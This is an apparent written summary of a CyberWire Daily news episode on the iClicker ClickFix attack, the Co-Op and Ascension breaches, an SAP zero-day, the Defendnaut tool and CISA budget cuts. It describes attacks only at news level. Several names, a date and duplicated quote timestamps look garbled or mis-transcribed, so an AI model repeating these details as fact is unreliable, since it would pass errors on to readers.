CyberWire Daily: No Quick Fix for a ClickFix Attack

Release Date: May 12, 2025

Introduction

In this episode of CyberWire Daily, host Dave Bittner discusses the latest cybersecurity threats and incidents impacting various sectors. The episode delves into a sophisticated social engineering attack on the IClicker platform, significant privacy settlements involving Google, widespread cyberattacks affecting retail chains in the UK, and critical vulnerabilities exploited by state-sponsored hackers. Additionally, the episode features an in-depth interview with Tim Starks, a senior reporter from Cyberscoop, who sheds light on proposed budget cuts to the Cybersecurity and Infrastructure Security Agency (CISA) and the political dynamics surrounding them.

Major Security Incidents

ClickFix Social Engineering Attack on IClicker

Between April 12th and 16th, 2025, the student engagement platform IClicker, utilized by approximately 5,000 instructors and 7 million students across major US universities like Michigan and Florida, fell victim to a sophisticated ClickFix social engineering attack. The attack involved a fake CAPTCHA that deceived users into executing a malicious PowerShell script. This script, once run, connected to a remote server to download additional malware, which either granted hackers full access or installed benign software to evade detection. The likely payload was an information stealer targeting credentials, browser data, and cryptocurrency wallets.

• IClicker’s Response: On May 6th, IClicker confirmed the breach, assuring that their applications and data remained unaffected and that the vulnerability had been patched. However, the exact number of affected users remains uncertain.

Google's Privacy Settlement with Texas

Google is set to pay $1.375 billion to the state of Texas to resolve allegations that it secretly tracked users’ locations, private browsing activities, and biometric data without consent. The lawsuit, spearheaded by Attorney General Ken Paxton, claims that Google continued tracking users even with location services disabled and utilized collected data for advertising revenue. Additionally, it is alleged that Google amassed biometric data, such as facial geometry, without proper consent.

• Google’s Stance: Google has denied wrongdoing but has updated its privacy policies in response to the allegations.
• Significance: This settlement marks one of the largest privacy-related fines in the United States.

Cyberattack on UK’s Co-Op Stores

Co-Op, a major retail cooperative in the UK with over 3,000 locations, is grappling with severe operational disruptions due to a prolonged cyberattack that began two weeks prior to the episode's release. The attack has led to empty shelves as key logistics systems remain offline, hindering deliveries.

• Impact on Operations: Staff report that depot shipments have dropped to below 20% of normal levels, prioritizing perishable items like meat, dairy, and eggs, while non-perishables such as produce, canned goods, and cigarettes remain scarce.
• Data Compromise: CEO Shirin Khoury Hawk confirmed that customer and member data were compromised, although the specific nature of the hack remains unclear.
• Recovery Efforts: Despite all stores remaining open, the recovery process is expected to take several weeks. On the Scottish island of Islay, Co-Op has implemented special delivery procedures to mitigate the impact.

Ascension Health Data Breach

Ascension Health reported a data breach affecting over 437,000 patients due to a vulnerability in a third-party vendor's software, not their own systems. Hackers exploited this flaw to steal sensitive information, including names, contact details, Social Security numbers, and health data. The breach is linked to the Clop ransomware group's December 2023 attack on Clio’s file transfer platform.

• Response: Impacted patients are being offered two years of free credit monitoring.
• Historical Context: This incident is smaller compared to Ascension's May 2024 ransomware attack, which affected 5.6 million individuals.

Critical Zero-Day Vulnerability in SAP Netweaver

A critical zero-day vulnerability in SAP Netweaver's Internet Communication Manager has been actively exploited by Chinese state-sponsored hackers. The flaw allows unauthenticated remote code execution via crafted HTTP requests.

• Current Exploitation: Despite the release of emergency patches, many SAP systems remain exposed.
• Target Sectors: High-value sectors such as finance and manufacturing are primary targets, aiming to steal sensitive data and establish persistent access.
• Detection Challenges: Researchers identified custom malware named Safire, which uses encrypted communication over SAP protocols, complicating detection efforts.
• Operational Impact: The attack chain initiates with a malicious SOAP request exploiting memory corruption, delivering a reverse shell, and subsequently modifying SAP configurations to maintain access. This campaign has disrupted operations in critical sectors, including healthcare, government, and infrastructure.

Varonis Uncovers Major Cybersecurity Threats

Varonis has identified two significant cybersecurity threats targeting IT administrators and cloud systems:

1. SEO Poisoning for Malware Delivery:

   • Method: Attackers exploit search engine optimization (SEO) poisoning to trick administrators into downloading malware masquerading as legitimate tools.
   • Consequences: These fake downloads can install backdoors like Smokemant or monitoring software, leading to credential theft and data exfiltration. In one instance, nearly a terabyte of data was stolen before a ransomware attack ensued.

2. Critical Root Access Flaw in Azure’s AZNFS Mount Utility:

   • Vulnerability: A flaw in Azure's AZNFS Mount utility, used in High-Performance Computing (HPC) and AI workloads, allows unprivileged users to escalate privileges to root by exploiting environment variables.
   • Severity: Although Microsoft has rated it as low severity, the potential for complete cloud compromise is significant.
   • Recommendations: Varonis urges immediate patching and advocates for a defense-in-depth strategy to mitigate exposure.

US Prosecutors Charge Foreign Nationals in Botnet Takedown

US prosecutors have charged three Russians and one Kazakhstani in relation to the dismantling of two major botnets, Any Proxy and Five Socks. These botnets were part of an operation named Moonlander, which fraudulently converted outdated wireless routers into proxy servers available for rent on seized websites, offering over 7,000 proxies and generating approximately $46 million over two decades.

• Operation Details: The campaign involved international cooperation and technical analysis from Lumen Technologies. Infected routers were primarily located in Oklahoma but had a global reach across more than 80 countries.
• Security Implications: The FBI warns that outdated routers, particularly older models from Linksys, Cisco, and TP-Link, remain prime targets for exploitation by various threat actors, including Chinese hackers.
• Preventative Measures: Authorities recommend replacing unsupported routers to prevent similar compromises.

Defendnaut: A New Tool Disabling Microsoft Defender

A newly developed tool named Defendnaut has emerged, which disables Microsoft Defender by exploiting the Windows Security Center API. Created by a GitHub developer, Defendnaut tricks Windows into recognizing a fake antivirus product as legitimate, thereby prompting the automatic disabling of Defender to avoid conflicts.

• Mechanism: The tool leverages reverse-engineered interactions with the undocumented Windows Security Center (WSC) API, injecting its code into trusted processes like Task Manager.
• Persistence and Risks: While Defendnaut requires administrative privileges and persistent installation to survive reboots, its ability to disable Defender poses significant risks if misused by malware developers.
• Expert Insights: Security experts highlight that although Defendnaut may not showcase advanced technical prowess, it exposes a critical security gap in how Windows manages antivirus product registration. The tool builds upon the developer’s previous project, nodefender, emphasizing the need for enhanced safeguards within WSC’s architecture.

Interview with Tim Starks: CISA Budget Cuts and Political Reactions

Tim Starks, a senior reporter from Cyberscoop, provides an in-depth analysis of the proposed $491 million budget cut to CISA, representing approximately 17-20% of its funding. This potential reduction has sparked significant controversy among lawmakers and cybersecurity experts.

Key Points from the Interview:

• Budget Proposal Context:

  • The administration's skinny budget proposal indicated substantial cuts to CISA without detailed justifications.
  • The rhetoric suggests that CISA is viewed by some as part of a "censorship industrial complex," although the administration has not provided concrete evidence to support this claim.

• Legislative Reactions:

  • Democratic Appropriators have vehemently opposed the cuts, labeling them a "killing blow" to the agency’s capabilities.
  • Republican Committee Chairperson Mark and Madai expressed the need for more detailed explanations, highlighting ongoing threats from China and Russia and questioning the rationale behind reducing CISA's budget.
  • Senator Chris Murphy, the top Democrat on the Homeland Security Appropriations Subcommittee, labeled the cuts as an "illegal gutting of cybersecurity at DHS" intended to divert funds to border security.

• Administration’s Justification:

  • The administration claims budget cuts are necessary to reduce the size of government, though this justification appears more ideological than based on CISA’s performance or needs.

• CISA’s Current Status:

  • CISA has already experienced personnel and program cuts, including the elimination of roles focused on monitoring extremist activities.
  • Kristi Noem, a prominent Republican, has referred to CISA as the "Ministry of Truth," echoing concerns about the agency's role in misinformation and censorship.

• Leadership and Future Outlook:

  • The nominee for CISA, Sean Plenky, is regarded as a competent cybersecurity professional who may strive to shield the agency from political interference and maintain its core mission despite budgetary constraints.
  • Historical parallels were drawn with the first Trump administration’s approach under Chris Krebs, who effectively kept CISA operational without getting entangled in political disputes.

• Strategic Implications:

  • Given the persistent cyber threats from nation-states, critics argue that cutting CISA’s budget undermines national cybersecurity resilience.
  • Tim Starks expressed skepticism about the administration's rationale, emphasizing the ongoing need for robust cybersecurity measures in the face of escalating threats.

Notable Quotes:

• Tim Starks [14:32]: "It's a pretty massive potential cut. And the reasons they talked about doing this, you know, they don't go into a lot of details..."
• Senator Chris Murphy [17:26]: "This was illegal because you're ignoring congressional mandates."
• Tim Starks [20:39]: "It doesn't make a lot of sense, like we were talking about. Why, you know, if you're, if you're concerned about Russia and China... that CISA has stood by and said, we believe Russia is a cyber threat."

Additional Security Insights

Common Denominators in Security Incidents

Dave Bittner highlights that the common denominator in security incidents is the escalation and lateral movement within networks. Compromised privileged accounts can lead to attackers seizing control of critical assets, especially in environments with poor directory hygiene and extensive technical debt. Identity attack paths, particularly in Active Directory, Entra ID, and hybrid configurations, remain attractive targets for threat actors due to their exploitability and the difficulty defenders face in detecting such breaches.

• Mitigation Strategy: Identity leaders are increasingly employing attack path management to connect identity and security teams, thereby reducing risk. Tools like Bloodhound Enterprise powered by SpectreOps are instrumental in visualizing and securing attack paths.

US Copyright Office AI Study

The US Copyright Office released a pre-publication version of part three of its AI study, coinciding with the abrupt dismissal of its top leadership. The 108-page report examines how copyright law, particularly fair use, should apply to AI training processes.

• Key Findings:

  • Presumptive Infringement: The report posits that copying during AI training is presumptively infringing and that even the model's weights may contain protected expressions.
  • Fair Use Criteria: Emphasizes that fair use depends on the ultimate application of the AI, not merely its training methodology.
  • Market Dilution Theory: Introduces a novel theory suggesting that AI-generated content could flood markets and devalue them, even without direct copying.

• Legal Implications: While courts are not bound by the report, its detailed reasoning is expected to influence over 40 ongoing copyright cases involving generative AI. The report’s future impact remains uncertain due to shifting political landscapes, but its legal arguments are already influencing broader discussions.

Conclusion

This episode of CyberWire Daily underscores the evolving and multifaceted nature of cybersecurity threats in 2025. From sophisticated social engineering attacks on educational platforms to significant privacy settlements and state-sponsored exploits, the landscape remains perilous. The in-depth interview with Tim Starks highlights the precarious position of CISA amidst political maneuvering, emphasizing the need for sustained investment in cybersecurity infrastructure. Additionally, emerging tools like Defendnaut and comprehensive studies on AI’s legal implications underscore the continuous arms race between threat actors and defenders. Staying informed and proactive is imperative for both organizations and individuals to navigate the complex cybersecurity terrain effectively.

Notable Quotes with Timestamps:

• Dave Bittner [00:02]: "We're going to talk about why attackers still love Web apps in 2025..."
• Tim Starks [14:30]: "The administration's skinny budget... indicated that they would be looking to cut CISA's budget by $491 million."
• Tim Starks [16:36]: "Senator Murphy's case was, this is illegal because you're ignoring congressional mandates."
• Tim Starks [17:26]: "Senator Murphy's case was, this is illegal because you're ignoring congressional mandates."
• Tim Starks [20:39]: "It doesn’t make a lot of sense... why would you cut these agencies? They need to do a better job..."
• Dave Bittner [20:59]: "Our adversaries are not slowing down or dialing back their investments in misinformation..."
• Tim Starks [22:19]: "Sean Plenky... can find a way to walk that tightrope."

Credits

• Senior Producer: Alice Carruth
• Producer: Liz Stokes
• Mixer: Trey Hester
• Music & Sound Design: Elliot Peltzman
• Executive Producer: Jennifer Ibin
• Publisher: Peter Kilpe
• Host: Dave Bittner

Additional Resources

• Register for CyberWire’s Live Webinar: Visit events.thecyberwire.com to register for the live discussion on the state of modern web application security.
• DeleteMe Special Offer: Listeners can receive a 20% discount on DeleteMe plans by visiting JoinDeleteMe.com N2K and using promo code N2K at checkout.
• ThreatLocker: Explore ThreatLocker’s solutions at www.threatlocker.com to secure your environment against ransomware and other attacks.
• Vanta Compliance Automation: Learn more about automating security compliance with Vanta at vanta.com.

Stay Informed: For more insights and daily briefings, subscribe to CyberWire Daily and ensure you’re equipped with the knowledge to stay ahead in the ever-changing cybersecurity landscape.